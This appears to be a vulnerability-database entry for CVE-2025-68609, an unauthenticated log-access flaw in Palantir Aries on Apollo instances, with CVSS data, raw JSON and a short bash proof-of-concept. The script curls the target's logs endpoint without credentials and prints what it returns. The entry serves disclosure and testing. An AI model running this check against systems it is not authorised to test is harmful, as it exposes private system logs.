Security Vulnerability Report
中文
CVE-2025-68609 CVSS 6.6 MEDIUM

CVE-2025-68609

Published: 2026-01-22 19:15:54
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability in Palantir's Aries service allowed unauthenticated access to log viewing and management functionality on Apollo instances using default configuration. The defect resulted in both authentication and authorization checks being bypassed, potentially allowing any network-accessible client to view system logs and perform operations without valid credentials. No evidence of exploitation was identified during the vulnerability window.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Palantir Aries (Apollo instances with default configuration)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-68609 PoC - Palantir Aries Unauthenticated Log Access # Usage: ./poc.sh <target_url> TARGET_URL="${1:-https://target.example.com}" # Check if the target is vulnerable by attempting to access logs endpoint echo "[*] Testing CVE-2025-68609 on ${TARGET_URL}" echo "[*] Attempting to access Aries log endpoint..." # Attempt to retrieve system logs without authentication RESPONSE=$(curl -sk -w "\n%{http_code}" "${TARGET_URL}/aries/api/v1/logs" -o /tmp/log_response.txt 2>&1) HTTP_CODE=$(echo "$RESPONSE" | tail -n1) if echo "$HTTP_CODE" | grep -qE "^(200|401|403)"; then echo "[+] Received HTTP response: $HTTP_CODE" if [ "$HTTP_CODE" = "200" ]; then echo "[!] VULNERABLE: No authentication required to access logs" echo "[*] Sample log content:" head -n 20 /tmp/log_response.txt else echo "[*] Authentication may be required, but endpoint exists" echo "[*] Further testing needed with valid credentials" fi else echo "[-] Unexpected response or endpoint not found" fi # Cleanup rm -f /tmp/log_response.txt

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68609", "sourceIdentifier": "[email protected]", "published": "2026-01-22T19:15:53.793", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in Palantir's Aries service allowed unauthenticated access to log viewing and management functionality on Apollo instances using default configuration. The defect resulted in both authentication and authorization checks being bypassed, potentially allowing any network-accessible client to view system logs and perform operations without valid credentials. No evidence of exploitation was identified during the vulnerability window."}, {"lang": "es", "value": "Una vulnerabilidad en el servicio Aries de Palantir permitió acceso no autenticado a la funcionalidad de visualización y gestión de registros en instancias de Apollo que utilizaban la configuración predeterminada. El defecto resultó en que tanto las comprobaciones de autenticación como las de autorización fueran eludidas, permitiendo potencialmente a cualquier cliente accesible por red ver los registros del sistema y realizar operaciones sin credenciales válidas. No se identificó evidencia de explotación durante la ventana de vulnerabilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-305"}]}], "references": [{"url": "https://palantir.safebase.us/?tcuUid=955a313a-1735-48a6-9fb4-e10404f14eb5", "source": "[email protected]"}]}}